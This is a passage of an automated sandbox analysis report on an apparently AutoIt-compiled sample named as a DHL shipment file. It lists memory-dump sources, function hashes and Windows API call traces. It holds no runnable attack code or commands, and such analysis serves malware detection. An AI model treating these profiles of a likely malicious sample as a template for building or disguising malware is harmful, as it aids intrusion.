• Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
Similarity
• API ID: ErrorMode$DriveType
• String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
• API String ID: 2907320926-4222207086
• Opcode ID: d60cdd43f289168c48f8b070e1174f03e824a4e29a124bfd5300ee14f859313a
• Instruction ID: 286a7447148832ffdba5c5daf69c3a848d86aaea03141e0c74ae927e456be9a8
• Opcode Fuzzy Hash: d60cdd43f289168c48f8b070e1174f03e824a4e29a124bfd5300ee14f859313a
• Instruction Fuzzy Hash: 575163B0648205ABCB24EBA1C9D2DBD73A5EF48700F204166E417B72D1DA719E46FF53
APIs
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00C89AD2
• SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00C89B8B
• SendMessageW.USER32(?,00001102,00000002,?), ref: 00C89BA7
Strings
Memory Dump Source
• Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
Similarity
• API ID: MessageSend$Window
• String ID: 0$@U=u
• API String ID: 2326795674-975001249
• Opcode ID: 1d85b7100ce802ecffd9b44a8519ddf4da25a469dc6a464cf95b3cf42172e9af
• Instruction ID: 3eb64dfb34c29eac00fee0fdf46ffbc31ca2a88bb2e0c89b0ad75071ad462c52
• Opcode Fuzzy Hash: 1d85b7100ce802ecffd9b44a8519ddf4da25a469dc6a464cf95b3cf42172e9af
• Instruction Fuzzy Hash: 3102EF30104201AFE729EF14C888BBBBBE4FF49308F08452DF9A5D62A1D735DA45DB5A
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
Similarity
• API ID: __wcsnicmp
• String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
• API String ID: 1038674560-86951937
• Opcode ID: 9dae0450504776ce17df6458be316d0f83ea148dad7cdbe2e3a72fee4a9b0987
• Instruction ID: ff490e37258ea5e5bb395bf54fa82780fdb52369d868c040f864bd58c67f13eb
• Opcode Fuzzy Hash: 9dae0450504776ce17df6458be316d0f83ea148dad7cdbe2e3a72fee4a9b0987
• Instruction Fuzzy Hash: 2B8102B0600216BBDF20BE61EC42FBB7768AF05700F044025F945AA5D2EB71DF66E7A1
APIs
• SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00C88AC1
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C88AD2
• CharNextW.USER32(0000014E), ref: 00C88B01
• SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00C88B42
• SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00C88B58
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C88B69
• SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00C88B86
• SetWindowTextW.USER32(?,0000014E), ref: 00C88BD8
• SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00C88BEE
• SendMessageW.USER32(?,00001002,00000000,?), ref: 00C88C1F
• _memset.LIBCMT ref: 00C88C44
• SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00C88C8D
• _memset.LIBCMT ref: 00C88CEC
• SendMessageW.USER32(?,00001053,000000FF,?), ref: 00C88D16
• SendMessageW.USER32(?,00001074,?,00000001), ref: 00C88D6E
• SendMessageW.USER32(?,0000133D,?,?), ref: 00C88E1B
• InvalidateRect.USER32(?,00000000,00000001), ref: 00C88E3D
• GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00C88E87
• SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00C88EB4
• DrawMenuBar.USER32(?), ref: 00C88EC3
• SetWindowTextW.USER32(?,0000014E), ref: 00C88EEB
Strings
Memory Dump Source
• Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
Similarity
• API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
• String ID: 0$@U=u
• API String ID: 1073566785-975001249
• Opcode ID: e7d0275072ee8f929dd5f185e6c7ef8cf2e3220ab42ad95165d95c4925c1b5b5
• Instruction ID: 75d1dadbda6c8f2ba6bae87b44ddc3cbf65005c20ca019cf47ae6520fcdda5bc
• Opcode Fuzzy Hash: e7d0275072ee8f929dd5f185e6c7ef8cf2e3220ab42ad95165d95c4925c1b5b5
• Instruction Fuzzy Hash: E4E1B370900218AFDF20EF51CC84FEE7BB9EF05714F50815AFA25AA590DB709A89DF64
APIs
• GetCursorPos.USER32(?), ref: 00C849CA
• GetDesktopWindow.USER32 ref: 00C849DF
• GetWindowRect.USER32(00000000), ref: 00C849E6
• GetWindowLongW.USER32(?,000000F0), ref: 00C84A48
• DestroyWindow.USER32(?), ref: 00C84A74
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00C84A9D
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C84ABB
• SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00C84AE1
• SendMessageW.USER32(?,00000421,?,?), ref: 00C84AF6
• SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00C84B09
• IsWindowVisible.USER32(?), ref: 00C84B29
• SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00C84B44
• SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00C84B58
• GetWindowRect.USER32(?,?), ref: 00C84B70
• MonitorFromPoint.USER32(?,?,00000002), ref: 00C84B96
• GetMonitorInfoW.USER32(00000000,?), ref: 00C84BB0
• CopyRect.USER32(?,?), ref: 00C84BC7
• SendMessageW.USER32(?,00000412,00000000), ref: 00C84C32
Strings
Memory Dump Source
• Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
Similarity
• API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
• String ID: ($0$tooltips_class32
• API String ID: 698492251-4156429822
• Opcode ID: 3e0e7bd34cf98062f80a51b9ca73a8ff9eba5feb3f40fe5b01954ff83ed6bdc3
• Instruction ID: f48c953c3faf00fe0a9b9f63f2f0f4e171a922f29a64e039ed1751d0b28a0ef4
• Opcode Fuzzy Hash: 3e0e7bd34cf98062f80a51b9ca73a8ff9eba5feb3f40fe5b01954ff83ed6bdc3
• Instruction Fuzzy Hash: 6AB18C71608341AFDB08EF64C844B6ABBE4FF88314F008A1CF5999B2A1D771ED05DB59
                                                                                        APIs
                                                                                        • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00C644AC
                                                                                        • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00C644D2
                                                                                        • _wcscpy.LIBCMT ref: 00C64500
                                                                                        • _wcscmp.LIBCMT ref: 00C6450B
                                                                                        • _wcscat.LIBCMT ref: 00C64521
                                                                                        • _wcsstr.LIBCMT ref: 00C6452C
                                                                                        • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00C64548
                                                                                        • _wcscat.LIBCMT ref: 00C64591
                                                                                        • _wcscat.LIBCMT ref: 00C64598
                                                                                        • _wcsncpy.LIBCMT ref: 00C645C3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                        • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                        • API String ID: 699586101-1459072770
                                                                                        • Opcode ID: c80eda48f23a26f147ee737430eedff179462a9e622595bec092045a9ae3b136
                                                                                        • Instruction ID: ff74e7c81a77d287e63450d4ff1d4ab49f3c586b997afb0ad5cbb5ded4ec933d
                                                                                        • Opcode Fuzzy Hash: c80eda48f23a26f147ee737430eedff179462a9e622595bec092045a9ae3b136
                                                                                        • Instruction Fuzzy Hash: 8241F7319002147BDB24BB74EC87EFF776CDF42710F14046AF905E6582EA749A02A7A9
                                                                                        APIs
                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00C028BC
                                                                                        • GetSystemMetrics.USER32(00000007), ref: 00C028C4
                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00C028EF
                                                                                        • GetSystemMetrics.USER32(00000008), ref: 00C028F7
                                                                                        • GetSystemMetrics.USER32(00000004), ref: 00C0291C
                                                                                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00C02939
                                                                                        • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00C02949
                                                                                        • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00C0297C
                                                                                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00C02990
                                                                                        • GetClientRect.USER32(00000000,000000FF), ref: 00C029AE
                                                                                        • GetStockObject.GDI32(00000011), ref: 00C029CA
                                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00C029D5
                                                                                          • Part of subcall function 00C02344: GetCursorPos.USER32(?), ref: 00C02357
                                                                                          • Part of subcall function 00C02344: ScreenToClient.USER32(00CC57B0,?), ref: 00C02374
                                                                                          • Part of subcall function 00C02344: GetAsyncKeyState.USER32(00000001), ref: 00C02399
                                                                                          • Part of subcall function 00C02344: GetAsyncKeyState.USER32(00000002), ref: 00C023A7
                                                                                        • SetTimer.USER32(00000000,00000000,00000028,00C01256), ref: 00C029FC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                        • String ID: @U=u$AutoIt v3 GUI
                                                                                        • API String ID: 1458621304-2077007950
                                                                                        • Opcode ID: 44544f5105b00a54ea0534edcf7f5135a9287c2847e53690b7c607927c6465da
                                                                                        • Instruction ID: acd94a76102bf428781013b087f142750b7ad8a153615ca0e50b71e551d867eb
                                                                                        • Opcode Fuzzy Hash: 44544f5105b00a54ea0534edcf7f5135a9287c2847e53690b7c607927c6465da
                                                                                        • Instruction Fuzzy Hash: 6EB16E75A0020ADFDB14DFA8DC89BAE7BB4FB08314F104229FA15E72D0DB74A951DB54
                                                                                        APIs
                                                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00C8BA56
                                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 00C8BA6D
                                                                                        • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00C8BA78
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00C8BA85
                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00C8BA8E
                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00C8BA9D
                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00C8BAA6
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00C8BAAD
                                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00C8BABE
                                                                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,00C92CAC,?), ref: 00C8BAD7
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00C8BAE7
                                                                                        • GetObjectW.GDI32(?,00000018,000000FF), ref: 00C8BB0B
                                                                                        • CopyImage.USER32(?,00000000,?,?,00002000), ref: 00C8BB36
                                                                                        • DeleteObject.GDI32(00000000), ref: 00C8BB5E
                                                                                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00C8BB74
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                        • String ID: @U=u
                                                                                        • API String ID: 3840717409-2594219639
                                                                                        • Opcode ID: 2e52d2315ed56ca309ef1de6210085ad424e17067ed72b8e3c8c23dc34c45126
                                                                                        • Instruction ID: d3448f76ca5c73a2dd5ad24d8cfa31902dae9089b4399e8f24a88dc13f7b7e4c
                                                                                        • Opcode Fuzzy Hash: 2e52d2315ed56ca309ef1de6210085ad424e17067ed72b8e3c8c23dc34c45126
                                                                                        • Instruction Fuzzy Hash: 8D412675600209EFDB21AF65DC88FAEBBB8FB89715F104068F915D7260D7309E02DB64
                                                                                        APIs
                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00C5A47A
                                                                                        • __swprintf.LIBCMT ref: 00C5A51B
                                                                                        • _wcscmp.LIBCMT ref: 00C5A52E
                                                                                        • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00C5A583
                                                                                        • _wcscmp.LIBCMT ref: 00C5A5BF
                                                                                        • GetClassNameW.USER32(?,?,00000400), ref: 00C5A5F6
                                                                                        • GetDlgCtrlID.USER32(?), ref: 00C5A648
                                                                                        • GetWindowRect.USER32(?,?), ref: 00C5A67E
                                                                                        • GetParent.USER32(?), ref: 00C5A69C
                                                                                        • ScreenToClient.USER32(00000000), ref: 00C5A6A3
                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00C5A71D
                                                                                        • _wcscmp.LIBCMT ref: 00C5A731
                                                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 00C5A757
                                                                                        • _wcscmp.LIBCMT ref: 00C5A76B
                                                                                          • Part of subcall function 00C2362C: _iswctype.LIBCMT ref: 00C23634
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                                        • String ID: %s%u
                                                                                        • API String ID: 3744389584-679674701
                                                                                        • Opcode ID: 96a89a5ba242d1db1a6204db5ac4365955ed7d0b1bdf2963f0f2ef76e6e5ba02
                                                                                        • Instruction ID: 46692ce373217fad766d13b070c729db1bdaf3f396baa3323706c151b92f0917
                                                                                        • Opcode Fuzzy Hash: 96a89a5ba242d1db1a6204db5ac4365955ed7d0b1bdf2963f0f2ef76e6e5ba02
                                                                                        • Instruction Fuzzy Hash: 56A1C335204606AFD714DF61C884FAAB7E8FF48356F044629FDA9C2150DB30EA99CB96
                                                                                        APIs
                                                                                        • GetClassNameW.USER32(00000008,?,00000400), ref: 00C5AF18
                                                                                        • _wcscmp.LIBCMT ref: 00C5AF29
                                                                                        • GetWindowTextW.USER32(00000001,?,00000400), ref: 00C5AF51
                                                                                        • CharUpperBuffW.USER32(?,00000000), ref: 00C5AF6E
                                                                                        • _wcscmp.LIBCMT ref: 00C5AF8C
                                                                                        • _wcsstr.LIBCMT ref: 00C5AF9D
                                                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 00C5AFD5
                                                                                        • _wcscmp.LIBCMT ref: 00C5AFE5
                                                                                        • GetWindowTextW.USER32(00000002,?,00000400), ref: 00C5B00C
                                                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 00C5B055
                                                                                        • _wcscmp.LIBCMT ref: 00C5B065
                                                                                        • GetClassNameW.USER32(00000010,?,00000400), ref: 00C5B08D
                                                                                        • GetWindowRect.USER32(00000004,?), ref: 00C5B0F6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                        • String ID: @$ThumbnailClass
                                                                                        • API String ID: 1788623398-1539354611
                                                                                        • Opcode ID: 1aa83ee8441e9da89ab95f656471ce5b9149445ca5711a06199f22f49be0f568
                                                                                        • Instruction ID: a7ecf0b102e48c8fb3aceb28b73a4dfa33bfb68e45e8c4e80d97307dc5f72bc8
                                                                                        • Opcode Fuzzy Hash: 1aa83ee8441e9da89ab95f656471ce5b9149445ca5711a06199f22f49be0f568
                                                                                        • Instruction Fuzzy Hash: F181D1751083059FDB04DF11C881FABBBE8EF94315F048669FD958A092DB34DE89CBA5
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00C8A259
                                                                                        • DestroyWindow.USER32(?,?), ref: 00C8A2D3
                                                                                          • Part of subcall function 00C07BCC: _memmove.LIBCMT ref: 00C07C06
                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00C8A34D
                                                                                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00C8A36F
                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C8A382
                                                                                        • DestroyWindow.USER32(00000000), ref: 00C8A3A4
                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00C00000,00000000), ref: 00C8A3DB
                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C8A3F4
                                                                                        • GetDesktopWindow.USER32 ref: 00C8A40D
                                                                                        • GetWindowRect.USER32(00000000), ref: 00C8A414
                                                                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00C8A42C
                                                                                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00C8A444
                                                                                          • Part of subcall function 00C025DB: GetWindowLongW.USER32(?,000000EB), ref: 00C025EC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                                        • String ID: 0$@U=u$tooltips_class32
                                                                                        • API String ID: 1297703922-1130792468
                                                                                        • Opcode ID: 4fcbb026232a8d67afbe89ee3f12f543909220274731d863e4f15c1e28b2fbcb
                                                                                        • Instruction ID: fe1afaa718e3ff9fd50ea809fc59d6a898895235b07a331d49361a79be027b09
                                                                                        • Opcode Fuzzy Hash: 4fcbb026232a8d67afbe89ee3f12f543909220274731d863e4f15c1e28b2fbcb
                                                                                        • Instruction Fuzzy Hash: F871CF70141204AFEB25DF28CC49F6B7BE5FB88308F04452EF995872A1D770EA46DB5A
                                                                                        APIs
                                                                                          • Part of subcall function 00C02612: GetWindowLongW.USER32(?,000000EB), ref: 00C02623
                                                                                        • DragQueryPoint.SHELL32(?,?), ref: 00C8C627
                                                                                          • Part of subcall function 00C8AB37: ClientToScreen.USER32(?,?), ref: 00C8AB60
                                                                                          • Part of subcall function 00C8AB37: GetWindowRect.USER32(?,?), ref: 00C8ABD6
                                                                                          • Part of subcall function 00C8AB37: PtInRect.USER32(?,?,00C8C014), ref: 00C8ABE6
                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00C8C690
                                                                                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00C8C69B
                                                                                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00C8C6BE
                                                                                        • _wcscat.LIBCMT ref: 00C8C6EE
                                                                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00C8C705
                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00C8C71E
                                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 00C8C735
                                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 00C8C757
                                                                                        • DragFinish.SHELL32(?), ref: 00C8C75E
                                                                                        • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00C8C851
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$@U=u
                                                                                        • API String ID: 169749273-762882726
                                                                                        • Opcode ID: ebd24930c68329e518bc680d65a848cfc5913807992e79160ec6bdaa962aa8c0
                                                                                        • Instruction ID: 757e5d49a765ea7ab26accdccff3e9c972e8881bb1a2f070f4bacf5fd0d491a2
                                                                                        • Opcode Fuzzy Hash: ebd24930c68329e518bc680d65a848cfc5913807992e79160ec6bdaa962aa8c0
                                                                                        • Instruction Fuzzy Hash: 16615C71508304AFC701EF64CC85E9FBBE8EF89714F100A2EF595921A1DB70AA49DB56
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
